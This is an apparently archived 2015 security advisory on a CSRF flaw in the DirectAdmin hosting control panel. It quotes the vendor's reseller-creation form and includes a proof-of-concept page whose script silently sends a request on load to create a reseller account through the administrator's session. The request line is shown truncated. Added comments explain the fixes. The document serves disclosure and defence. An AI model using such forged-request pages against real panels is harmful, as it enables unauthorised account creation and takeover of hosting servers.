# Title : DirectAdmin (1.44.3) CSRF Vulnerability
# Date : 10-10-2015
# Version : 1.43.3-1.44.3
# Author : @babayarisi http://ha.cker.io
# Vendor : http://www.directadmin.com/
# Download: http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a web-based hosting control panel.

#As you can see, the original form doesn't include CSRF protection or any secret token.
<!-- Vendor's reseller-creation form, quoted by the advisory as evidence.
     The only hidden field is action=create; there is no hidden per-session
     token, so every parameter the endpoint accepts is predictable from
     outside the victim's session. Fix on the server side: add an
     unpredictable, session-bound token as a hidden input and verify it
     before CMD_ACCOUNT_ADMIN performs the create action; validating the
     Origin/Referer header and marking the session cookie SameSite are
     additional layers. Attribute names such as _onSubmit_ / _onChange_
     appear to be the mailing-list archive's rewriting of the original
     event-handler attributes (onSubmit, onChange) - not vendor markup. -->
<form name=reseller action="" method="post" _onSubmit_="return formOK()">
<input type=hidden name=action value=create>
<!-- The rows below are shown without their enclosing <table>; the excerpt
     is a fragment, not a complete document. -->
<tr><td class="list">Username:</td><td class="list"><input type=text name=username maxlength=12 _onChange_="checkName()"></td></tr>
<tr><td class="list">E-Mail:</td><td class="list"><input type=text name=email _onChange_="checkEmail()"></td></tr>
<tr><td class="list">Enter Password:</td><td class="list"><input type=password name=passwd> <input type=button value="Random" _onClick_="randomPass()"></td></tr>
<tr><td class="list">Re-Enter Password:</td><td class="list"><input type=password name=passwd2 _onChange_="checkPass()"></td></tr>
<tr><td class="list">Send Email Notification:</td><td class="list"><input type=checkbox value="yes" name=notify checked> <a href="">Edit Admin Message</a></td></tr>

<!-- "<td td" is a duplicated tag name in the quoted source (left as-is). -->
<tr><td td class="listtitle" colspan=3 align=right>
<input type=submit value="Submit">
</td></tr>
</form>

#POC
<html>
<!-- Advisory proof-of-concept, reproduced verbatim as archived.
     On load, yurudi() points the hidden <img> at the CMD_ACCOUNT_ADMIN
     endpoint of the target panel, so a browser that has an admin session
     with that panel issues the request with its ambient cookies - the
     cross-site request the advisory describes. The mailing-list archive
     has truncated the request URL (the urlson line) and the src
     assignment, so this listing is incomplete and not runnable as-is.
     Defensive takeaway: the endpoint accepts a state-changing action
     without a session-bound anti-CSRF token; requiring such a token,
     rejecting state changes over GET, and checking Origin/Referer
     (plus SameSite on the session cookie) close this class of issue. -->
<head>
<title>POC</title>
</head>
<!-- language="_javascript_" is presumably the archive's rewriting of
     language="javascript"; the attribute is obsolete anyway. -->
<script language="_javascript_">

function yurudi(){
// Demo placeholder values from the advisory: the panel host, and the
// reseller account details the request would carry.
var adress ="www.demo.com";
var username="demo";
var email ="[email protected]";
var password="12345";
// Request URL against the DirectAdmin port (2222). The archive cut the
// line off after "action=", so the query string the original built from
// the variables above is not recoverable from this listing.
var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action="">

// Triggers the request by setting the image source; also truncated here.
document.getElementById("resim").src="" />}
</script>

<!-- _onload_ is presumably the archived form of onload. -->
<body _onload_="yurudi()">
<!-- Zero-size image used as the request carrier; <img> is a void element,
     so the closing </img> tag is invalid markup (kept as quoted). -->
<img id="resim" src="" style="height:0px;width:0px;"></img>
</body>
</html>
#POC

# don't be evil!
